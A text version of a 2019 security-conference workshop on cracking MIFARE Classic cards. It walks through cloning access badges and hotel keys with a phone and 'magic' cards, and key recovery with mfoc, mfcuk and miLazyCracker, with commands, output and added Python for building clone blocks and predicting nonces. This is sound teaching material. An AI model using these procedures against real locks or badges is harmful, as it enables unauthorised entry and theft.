Cracking Mifare Classic On The Cheap Workshop - Smart Lock Picking


Cracking Mifare Classic on the cheap
Workshop
Sławomir Jasek
HackInParis, 19-20.06.2019

Sławomir Jasek (pronounced: suavomeer yaseck)
Enjoying appsec (dev, break, build...) since 2003.
„Smart lockpicking” trainings: www.smartlockpicking.com
A significant part of my time goes into research.

How much can we fit in 45 min?
- Mifare Classic: intro, hardware needed
- Card UID, cloning an access control badge using a phone
- Mifare Classic data
- Attacks and required hardware:
  - brute-force leaked keys, clone a hotel key
  - „nested”, „darkside”, „hardnested” attacks

Card types, frequencies, ...
- 125 kHz („low frequency”, RFID): EM4XX (Unique), HID Prox, Indala, Honeywell, AWID, ...
- 13.56 MHz („high frequency”, NFC): Mifare/DESFire, iCLASS, Legic, Calypso, contactless payments, ... (covered today)
- 868 MHz (UHF), other: vehicle id, asset tracking

Mifare Classic
„The MIFARE Classic family is the most widely used contactless smart card ICs operating in the 13.56 MHz frequency range with read/write capability” (NXP: ...ds/2015/03/MIFARE Classic EV1.pdf)
Used for: city cards, access control, student ids, memberships, internal payment, tourist cards, ski passes, hotels, ...

Some Mifare Classic hacking tools (features vs price)
- Proxmark 3: 50-300 EUR
- NXP PN532: 5-40 EUR
- Android smartphone + free mobile app

What will you need?
- Mifare Classic: intro
- Card UID, usage in access control, cloning
- Mifare Classic data: intro
- Attacks and required hardware:
  - brute-force leaked keys
  - „nested”, „darkside”, „hardnested” attacks (possible as homework)

What I brought here
You can easily get it yourself, e.g. from Aliexpress (China) or some local distributors.
Note: the quality may vary.

What is stored on the card?
- UID: individual, read-only, not protected
- Data: stored in sectors, protected by access keys

The simplest access control systems
- Check just the individual ID (UID): 3-10 bytes (most commonly 4)
- Read-only, freely accessible to read
- The reader checks whether the ID is registered („UID valid?”)

The UID
Security: the UID is set in the factory and cannot be altered. Only the vendor knows how to make a tag, by laser fusing of polysilicon links.
Guess what happened next?

„Magic UID” or „UID-changeable” cards
Allow changing the UID („magic UID” -> any UID). Various generations:
- gen 1: requires special hardware (e.g. PN532)
- gen 2: possible to write using a mobile phone

EXERCISE #1: Clone a Mifare UID using a mobile phone

Our access control card
Quite common setup for apartments, gates, parking lots, offices, ...

Clone the access control card using Android
Mifare Classic Tool (MCT) by @iiiikarus, free (Play Store id: de.syss.MifareClassicTool)
Note: some phones are not compatible, see .../MifareClassicTool/blob/master/INCOMPATIBLE_DEVICES.md

Read the UID using a mobile phone
Tools -> Display tag info. MCT also displays the UID whenever a new tag is detected.

Write the UID using a smartphone?
A standard card's UID is read-only. You need a „direct write” (Gen 2) UID-changeable card.
For example my business card: https://smartlockpicking.com/card

Swipe the original card by the phone

MCT shows the original UID. Now swipe the „magic” card by the phone to write it there. It worked!

Now try the cloned card at the reader!
Video: https://www.youtube.com/watch?v=btLQB8WCQXA

BTW, it also works for hotels
A reader by the door (not embedded in the lock) that checks only the UID.
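The following is an added example, not code from the workshop or from Mifare Classic Tool: it builds the 16-byte manufacturer block (block 0) that a „direct write” Gen 2 UID-changeable card accepts, and checks a block 0 read back from a card. For a 4-byte UID the block holds UID, BCC (XOR of the UID bytes), SAK, ATQA as stored on the card, and 8 manufacturer bytes. The sample UID, the SAK/ATQA defaults (0x08 and 04 00, what a Classic 1K reports) and the zeroed manufacturer bytes are assumptions for the example; a clone with a wrong BCC is what most often makes a copied UID fail at the reader.

```python
# Added example (not from the workshop slides or MCT): build and sanity-check block 0
# for a Gen 2 ("direct write") UID-changeable card.
# Block 0 layout for a 4-byte UID:
#   UID[0..3] | BCC | SAK | ATQA (2 bytes as stored in block 0) | 8 manufacturer bytes

def bcc(uid: bytes) -> int:
    """ISO 14443-3 block check character: XOR of the UID bytes."""
    result = 0
    for b in uid:
        result ^= b
    return result

def build_block0(uid: bytes, sak: int = 0x08, atqa: bytes = b"\x04\x00",
                 manufacturer: bytes = bytes(8)) -> bytes:
    """Return the 16-byte block 0 for a 4-byte UID.
    Defaults: SAK 0x08 and ATQA stored as 04 00 (a MIFARE Classic 1K); the 8 manufacturer
    bytes are free and zeroed here (assumption for the example)."""
    if len(uid) != 4:
        raise ValueError("this helper handles 4-byte (single size) UIDs only")
    if len(atqa) != 2 or len(manufacturer) != 8:
        raise ValueError("ATQA must be 2 bytes and manufacturer data 8 bytes")
    return uid + bytes([bcc(uid), sak]) + atqa + manufacturer

def check_block0(block: bytes) -> dict:
    """Decode a block 0 read back from a card and report whether its BCC is consistent."""
    if len(block) != 16:
        raise ValueError("block must be 16 bytes")
    uid = block[:4]
    return {
        "uid": uid.hex().upper(),
        "bcc_ok": block[4] == bcc(uid),
        "sak": block[5],
        "atqa": block[6:8].hex().upper(),
    }

def mct_block_line(block: bytes) -> str:
    """Hex form as typed into the MCT block editor (32 uppercase hex digits)."""
    return block.hex().upper()

if __name__ == "__main__":
    original_uid = bytes.fromhex("DEADBEEF")      # constructed sample UID, not a real card
    clone = build_block0(original_uid)
    print(mct_block_line(clone))
    print(check_block0(clone))
    # A block 0 copied by hand with one typo in the UID: the BCC no longer matches
    typo = bytes.fromhex("DEADBEEA") + clone[4:]
    print(check_block0(typo)["bcc_ok"])
```

A Gen 2 card takes this block through a normal authenticated write of block 0 (sector 0 key A), which is why a phone suffices; Gen 1 cards need the backdoor command and therefore a PN532 or Proxmark, as the slide says.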

EXERCISE #2: Mifare Classic data

Try reading the content of the access control card
Use „std.keys” (the default keys). The dumped content: blank (all 0s).

Mifare Classic data structure
- MF Classic 1K: 16 sectors, each with 4 16-byte blocks
- Each sector has 2 different keys: A (e.g. for reading) and B (e.g. for writing), stored in the last block of the sector along with the access rights
Layout: Sector 0 = Block 0, Block 1, Block 2, [Key A | access rights | Key B]; Sector 1 = Block 4, Block 5, Block 6, [Key A | access rights | Key B]; ...

The access control (blank) card content
- Manufacturer block (read-only), containing the card UID
- Data (blank, 0s)
- Key A (default), access conditions, Key B (default)
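As an added example (not from the workshop slides or any of the tools it names), the following parses a raw MIFARE Classic 1K dump of the kind MFOC writes (1024 bytes: 16 sectors of 4 blocks of 16 bytes) and decodes every sector trailer into Key A, Key B and the access conditions per block. The access-bit layout (each C1/C2/C3 nibble stored once plain and once inverted) and the two condition tables follow the NXP MF1S50 datasheet; the dump itself, its keys and the hotel-style payload are constructed for the example.

```python
# Added example (not from the workshop slides): decode a MIFARE Classic 1K dump (.mfd).

BLOCK = 16
BLOCKS_PER_SECTOR = 4
SECTORS_1K = 16

# Data block permissions indexed by (C1, C2, C3): (read, write, increment, decrement/restore)
DATA_ACCESS = {
    (0, 0, 0): ("A|B", "A|B", "A|B", "A|B"),      # transport configuration
    (0, 1, 0): ("A|B", "never", "never", "never"),
    (1, 0, 0): ("A|B", "B", "never", "never"),
    (1, 1, 0): ("A|B", "B", "B", "A|B"),
    (0, 0, 1): ("A|B", "never", "never", "A|B"),
    (0, 1, 1): ("B", "B", "never", "never"),
    (1, 0, 1): ("B", "never", "never", "never"),
    (1, 1, 1): ("never", "never", "never", "never"),
}
# Trailer permissions: (keyA read, keyA write, bits read, bits write, keyB read, keyB write)
TRAILER_ACCESS = {
    (0, 0, 0): ("never", "A", "A", "never", "A", "A"),
    (0, 1, 0): ("never", "never", "A", "never", "A", "never"),
    (1, 0, 0): ("never", "B", "A|B", "never", "never", "B"),
    (1, 1, 0): ("never", "never", "A|B", "never", "never", "never"),
    (0, 0, 1): ("never", "A", "A", "A", "A", "A"),  # transport (access bytes FF 07 80 69)
    (0, 1, 1): ("never", "B", "A|B", "B", "never", "B"),
    (1, 0, 1): ("never", "never", "A|B", "B", "never", "never"),
    (1, 1, 1): ("never", "never", "A|B", "never", "never", "never"),
}

def decode_access_bits(b6: int, b7: int, b8: int):
    """Return (valid, [(C1, C2, C3) for block 0..3]) from trailer bytes 6, 7, 8.
    A plain/inverted nibble mismatch means a corrupt trailer (on a real card that
    sector is bricked), so report it instead of guessing."""
    c1, c2, c3 = (b7 >> 4) & 0xF, b8 & 0xF, (b8 >> 4) & 0xF
    nc1, nc2, nc3 = b6 & 0xF, (b6 >> 4) & 0xF, b7 & 0xF
    valid = (c1 ^ nc1, c2 ^ nc2, c3 ^ nc3) == (0xF, 0xF, 0xF)
    conds = [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]
    return valid, conds

def parse_dump(dump: bytes):
    """Split a 1K dump into sectors and decode each trailer."""
    if len(dump) != SECTORS_1K * BLOCKS_PER_SECTOR * BLOCK:
        raise ValueError("expected a raw 1K dump of 1024 bytes")
    sectors = []
    for s in range(SECTORS_1K):
        base = s * BLOCKS_PER_SECTOR * BLOCK
        trailer = dump[base + 3 * BLOCK: base + 4 * BLOCK]
        valid, conds = decode_access_bits(trailer[6], trailer[7], trailer[8])
        trailer_perm = TRAILER_ACCESS[conds[3]]
        sectors.append({
            "sector": s,
            "key_a": trailer[:6].hex().upper(),
            "key_b": trailer[10:].hex().upper(),
            "access_valid": valid,
            "data_blocks": [DATA_ACCESS[c] for c in conds[:3]],  # (read, write, inc, dec)
            "trailer": trailer_perm,
            # If key B can be read with key A, key B protects nothing: it is just data.
            "key_b_readable": trailer_perm[4] != "never",
        })
    return sectors

def mct_key_file(sectors) -> str:
    """Unique keys, one per line: the format Mifare Classic Tool imports as a key file."""
    keys = sorted({s["key_a"] for s in sectors} | {s["key_b"] for s in sectors})
    return "\n".join(keys)

def build_sample_dump() -> bytes:
    """Constructed dump: sector 0 in transport configuration with default keys, sector 1
    locked down as access-control cards often are (data readable with A or B, writable
    with B only: access bytes 78 77 88), all other sectors default."""
    default_trailer = bytes.fromhex("FFFFFFFFFFFF" "FF078069" "FFFFFFFFFFFF")
    locked_trailer = bytes.fromhex("A0A1A2A3A4A5" "78778800" "B0B1B2B3B4B5")
    data = bytearray(SECTORS_1K * BLOCKS_PER_SECTOR * BLOCK)
    for s in range(SECTORS_1K):
        base = s * BLOCKS_PER_SECTOR * BLOCK
        data[base + 3 * BLOCK: base + 4 * BLOCK] = locked_trailer if s == 1 else default_trailer
    data[0:16] = bytes.fromhex("DEADBEEF22080400" "0000000000000000")  # manufacturer block
    data[64:80] = b"hotel-room-1234!"                                   # constructed payload
    return bytes(data)

if __name__ == "__main__":
    sectors = parse_dump(build_sample_dump())
    for sec in sectors[:2]:
        print(sec)
    print(mct_key_file(sectors))
```

Two things this makes visible that the MCT dump view does not: whether the access bits are self-consistent before you write a trailer back to a card, and whether key B is readable with key A, in which case „key A for reading, key B for writing” gives no protection at all, because anyone holding key A can read key B from the trailer.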

Now try with the hotel key
This tag unlocks our hotel door lock.

Try to dump the hotel tag
No: the standard keys did not work for sector 0.

Leaked keys database

Our key was in the leaked db. Dump: the hotel access data.

Clone the card?

Write the data: in our case only sector 0 has data.

Now try the cloned card at the reader. Yes, it works in so many hotels.

Wipe the „magic” card again!

The hotel key data: sector 0

Hotel key data
I checked in Friday, 14.06.2019 and stay till next Saturday.
Check-in: 2019.06.14, 9:26
Check-out: 2019.06.22, 12:30

„Master” card that unlocks all the doors?
Having just a guest card for any hotel using this system, I can create a „master” card in 1 min (in most cases using just a phone).
I'm sorry I can't tell you how to do it; it looks like the vendor will not patch ;)

4-star hotel: unlock all the doors like a boss (video)

My hotel in Paris recently: same system.

Mifare Classic cracking process
Try default/leaked keys (few seconds) -> have all keys? YES -> HOORAY!

EXERCISE #3: Cracking access keys using the „nested” attack

For the next challenge
The hotel has set a different, individual key. Take the next card from the set and try to read it.

Keys not leaked?
Nope, it does not work: the keys are not leaked.
Brute-force all possible values? A Classic key is 48 bits, so that takes far too much time.
There are several other attacks possible!

Mifare Classic cracking process
Try default/leaked keys (few seconds) -> have all keys?
- YES -> HOORAY!
- NO -> have at least one key? YES -> „nested” -> HOORAY!

What if we could not brute-force the key?
The „nested” attack exploits the weak (predictable) RNG of the card together with the way a second authentication works: once authenticated to one sector, the card's nonce for the next sector is sent encrypted, but it can be guessed, and that leaks the other sector's key. It requires at least one known key to any sector.
Technical details: http://www.cs.ru.nl/~r
Example: sector 0 key FFFFFFFFFFFF (known); sectors 1, 2, 3, 4, ... keys unknown.

How to exploit it?
Not possible using a smartphone; some non-standard communication is required.
PN532 + libnfc + MFOC by Nethemba: https://github.com/nfc-tools/mfoc
Kali Linux: installed by default.
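To make the „weakness in the RNG” concrete, here is an added example (not from the workshop slides, and not the code of MFOC or any other tool): the 16-bit LFSR that generates the nonces of an original MIFARE Classic. The card's 32-bit nonce nT is 32 consecutive output bits of the LFSR with polynomial x^16 + x^14 + x^13 + x^11 + 1, so the second half of every nonce is fully determined by the first half, and the nonce the card will emit any number of clocks later can be computed in advance. A check of this kind is also how a tool can tell a vulnerable Classic from a hardened card, whose nonces do not pass it. The byte-order handling follows the public Crypto-1 research tooling; the sample LFSR states are constructed, and 0x01200145 is the value commonly cited as the power-on nonce of an original Classic.

```python
# Added example (not from the workshop slides): the MIFARE Classic nonce PRNG.

def lfsr16_step(x: int) -> int:
    """One clock of the Classic PRNG: shift right, feed back bits 0, 2, 3 and 5 into bit 15."""
    fb = (x ^ (x >> 2) ^ (x >> 3) ^ (x >> 5)) & 1
    return (x >> 1) | (fb << 15)

def lfsr16_advance(x: int, n: int) -> int:
    for _ in range(n):
        x = lfsr16_step(x)
    return x

def _swap32(x: int) -> int:
    """Reverse byte order: the card sends the nonce byte by byte, LSB of each byte first,
    so the first transmitted byte is the oldest LFSR output."""
    return int.from_bytes(x.to_bytes(4, "big"), "little")

def weak_nonce_from_state(state: int) -> int:
    """The nonce a genuine Classic emits from a given 16-bit LFSR state."""
    state &= 0xFFFF
    return _swap32(state | (lfsr16_advance(state, 16) << 16))

def is_weak_prng_nonce(nt: int) -> bool:
    """True if the last 16 bits of nT are the 16-clock successor of the first 16 bits."""
    s = _swap32(nt & 0xFFFFFFFF)
    return lfsr16_advance(s & 0xFFFF, 16) == (s >> 16)

def prng_successor(nt: int, n: int) -> int:
    """The nonce the card produces n LFSR clocks after emitting nT. This predictability is
    what 'nested' exploits: with the timing distance known, the encrypted nonce of the next
    authentication can be guessed."""
    s = _swap32(nt & 0xFFFFFFFF)
    lo = lfsr16_advance(s & 0xFFFF, n)
    return _swap32(lo | (lfsr16_advance(lo, 16) << 16))

def classify(nonces) -> str:
    """Decide the attack path from a few captured nonces (a random nonce passes the
    test with probability 1/65536, so a mixed result deserves a second look)."""
    weak = sum(1 for n in nonces if is_weak_prng_nonce(n))
    if weak == len(nonces):
        return "weak PRNG: nested/darkside"
    if weak == 0:
        return "hardened: hardnested"
    return "mixed, inspect"

if __name__ == "__main__":
    first = 0x01200145                       # commonly cited power-on nonce of a Classic
    print(hex(first), is_weak_prng_nonce(first))
    print(hex(prng_successor(first, 64)))    # what the card will send 64 clocks later
    print(classify([weak_nonce_from_state(0x1234), first]))
    # Flipping one bit breaks the LFSR relation, as a random nonce almost always does
    print(classify([first ^ 0x100]))
```

Nonces from a real card are captured during the anti-collision/authentication exchange with a PN532 or Proxmark; the phone's NFC stack does not expose them, which is the slide's „some non-standard communication required”.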

How to connect our PN532 board?

Connect to Linux, check your device is recognized
Kernel log after plugging in the USB-serial adapter:
  root@kali:~#
  [301928.142996] usb 1-1.3: Product: USB-Serial Controller
  usb 1-1.3: Manufacturer: Prolific Technology Inc.
  pl2303 1-1.3:1.0: pl2303 converter detected
  usb 1-1.3: pl2303 converter now attached to ttyUSB0

Edit the /etc/nfc/libnfc.conf config file
Uncomment (at the end of the file):
  device.connstring = "pn532_uart:/dev/ttyUSB0"

Check if it works correctly
  root@kali:~# nfc-list
  nfc-list uses libnfc 1.7.1
  NFC device: pn532_uart:/dev/ttyS0 opened
OK

Troubleshooting: communication error
  root@kali:~# nfc-list
  nfc-list uses libnfc 1.7.1
  error   libnfc.driver.pn532_uart   pn53x_check_communication error
  nfc-list: ERROR: Unable to open NFC device: pn532_uart:/dev/ttyS0
Check your wiring.

MFOC tool
  root@kali:~# mfoc -O hotel.mfd
-O: output dump file. The tool will:
1. Check if any sector's key is default/publicly known
2. Leverage one known key to recover the others using the „nested” attack

Try default keys

Default keys found, but the key to sector 0 is missing.

A few minutes later: found the remaining keys.

Using a Proxmark? 5 seconds (about 2 s/key).

You can now add the cracked keys to MCT
Create a new key file or edit an existing one. From now on you can read the card content with a phone.

Mifare Classic cracking process
Try default/leaked keys (few seconds) -> have all keys?
- YES -> HOORAY!
- NO -> have at least one key?
  - YES -> „nested” (few sec on a Proxmark, few min on a PN532) -> HOORAY!
  - NO -> ?

But what if all the keys are unknown?
„Darkside” attack (Nicolas T. Courtois): a side channel. Tool: MFCUK by Andrei Costin, https://github.com/nfc-tools/mfcuk
With a PN532 it may take 30 minutes for one key. Having one key, proceed with „nested”.
Example: sectors 0, 1, 2, 3, 4, ... all keys unknown.

Libnfc implementation: MFCUK (https://github.com/nfc-tools/mfcuk)
  # mfcuk -C -R 0:A -s 250 -S 250 -v 3
-R 0:A: recover key A of sector 0. -s 250 -S 250: sleep options, necessary for our hardware. -v 3: verbosity, so we can see progress.

Mifare Classic cracking process
Try default/leaked keys (few seconds) -> have all keys?
- YES -> HOORAY!
- NO -> have at least one key?
  - YES -> „nested” (few sec on a Proxmark, few min on a PN532) -> HOORAY!
  - NO -> „darkside” (30 sec on a Proxmark, 30-60 min on a PN532) -> cracked 1 key -> „nested” -> HOORAY!

MIFARE CLASSIC EV1

Mifare Classic EV1 („hardened”)
The „nested” and „darkside” attacks exploit implementation flaws (PRNG, side channel, ...).
Mifare Classic EV1, and Mifare Plus in Classic mode (SL1), fix these exploit vectors.
Your example card: „Mifare Classic EV1” with guest hotel card content.

Hardnested + libnfc
„Hardnested” attack: exploits a CRYPTO1 weakness. Tech details: http://cs.ru.nl/~rverdult/Ciphertext-only_Cryptanalysis_on_Hardened_Mifare_Classic_Cards-CCS_2015.pdf
PN532 + libnfc: miLazyCracker automatically detects the card type and proceeds with the relevant attack. Video: https://www.youtube.com/watch?v=VcU3Yf5AqQI

miLazyCracker: installation
  root@kali:~# git clone ... (the miLazyCracker repository)
  root@kali:~# cd miLazyCracker/
  root@kali:~/miLazyCracker# ./miLazyCrackerFreshInstall.sh
Recently it may not build out of the box (missing dependencies).

miLazyCracker: installation troubleshooting
The installation depends on external sources that are not officially available any more.

miLazyCracker vs Mifare Classic EV1
  root@kali:~# miLazyCracker
  (...)
  Card is not vulnerable to nested attack
  MFOC not possible, detected hardened Mifare Classic
  Trying HardNested Attack...
  libnfc_crypto1_crack ffffffffffff 60 B 8 A mfc_de7d61c0_foundKeys.txt
  (...)
  Found key: 1ab2[...]

Mifare Classic hardened (Plus SL1, EV1) cracking
Try default/leaked keys (few seconds) -> have all keys?
- YES -> HOORAY!
- NO -> have at least one key?
  - YES -> „hardnested” (several min) -> HOORAY!
  - NO -> ?

EV1 with all sectors secured?
„Hardnested” requires at least one known key. What if all the keys are unknown?
Recover a key using an online attack (mfkey): requires emulating/sniffing the card at a valid reader.
Hardware: Proxmark, Chameleon Mini RevE „Rebooted” (from about 30 EUR), ...

Mifare Classic hardened (Plus SL1, EV1) cracking
Try default/leaked keys (few seconds) -> have all keys?
- YES -> HOORAY!
- NO -> have at least one key?
  - YES -> „hardnested” (several min) -> HOORAY!
  - NO -> reader attack (a trip to the reader) -> one key -> „hardnested” -> HOORAY!

Final NXP recommendation to upgrade (2015.10)
NXP recommends that existing MIFARE Classic systems be upgraded (e.g. to DESFire). Furthermore, NXP does not recommend designing in MIFARE Classic in any security-relevant application.
Source: NXP statement on Crypto1 implementations (.../pto1-implementations/)

WANT TO LEARN MORE?

Want to learn more?
„A 2018 Practical Guide To Hacking RFID/NFC” (Confidence 2018): A 2018 Practical Guide To Hacking RFID NFC.pdf, https://www.youtube.com/watch?v=7GFhgv5jfZk

Want to learn more?
Trainings, tutorials, events... Don't forget to subscribe to the newsletter: https://www.smartlockpicking.com

Cracking Mifare Classic on the cheap (Workshop)
Sławomir Jasek, slawomir.jasek@smartlockpicking.com, @slawekja
HackInParis, 19-20.06.2019
